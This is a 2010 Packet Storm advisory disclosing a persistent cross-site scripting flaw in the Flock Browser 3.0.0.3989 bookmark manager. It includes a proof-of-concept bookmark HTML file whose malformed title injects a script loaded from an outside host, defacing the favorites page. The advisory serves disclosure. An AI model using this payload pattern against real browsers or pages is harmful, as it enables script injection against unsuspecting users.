Flock Browser 3.0.0.3989 Malformed Bookmark Cross Site Scripting

2010-08-21T00:00:00
ID PACKETSTORM:92939
Type packetstorm
Reporter Lostmon
Modified 2010-08-21T00:00:00

Description

                                        
                                            `#########################################  
Flock Browser 3.0.0.3989 Malformed Bookmark XSS  
Vendor URL: http://beta.flock.com/  
Advisore: http://lostmon.blogspot.com/2010/08/flock-browser-3003989-malformed.html  
Vendor notify:NO exploits availables:YES  
#########################################  
  
Flock is faster, simpler, and more friendly. Literally.  
It's the only sleek, modern web browser with the built-in  
ability to keep you up-to-date with your Facebook and Twitter  
friends.This browser version (3.0.0.3989) is based in a old  
chromium project  
  
  
Flock has a flaw that allows Cross-site scripting style attacks  
In bookmarks is has a Malformed bookmark title persistent xss  
when inport from other browsers a malformed bookmark or when add  
a new malformed bookmark or import a bookmark html file.  
  
###############################  
Example Of Bookmark html file  
###############################  
  
<!DOCTYPE NETSCAPE-Bookmark-file-1>  
<!-- This is an automatically generated file.  
It will be read and overwritten.  
DO NOT EDIT! -->  
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8">  
<TITLE>Bookmarks</TITLE>  
<H1>Menú Marcadores</H1>  
<DL><p>  
<DT><A HREF="http://www.mozilla.org" ADD_DATE="1282083605"  
LAST_MODIFIED="1282083638">"><script  
src='http://vuln.xssed.net/thirdparty/scripts/ckers.org.js'></A>  
</DL><p>  
  
#####################EOF##################  
  
It is a persintent script insercion and when the user click in the  
menu for view  
favorites page or access directly to favorites url this make a  
"defacement" of this page and them the user can´t access to favorites  
:)  
( Url of favorites =>  
chrome-extension://flock_people/favorites.html#p=1&v=all&o=0&s=title )  
  
################# €nd #######################  
  
Atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
  
  
  
--   
atentamente:  
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`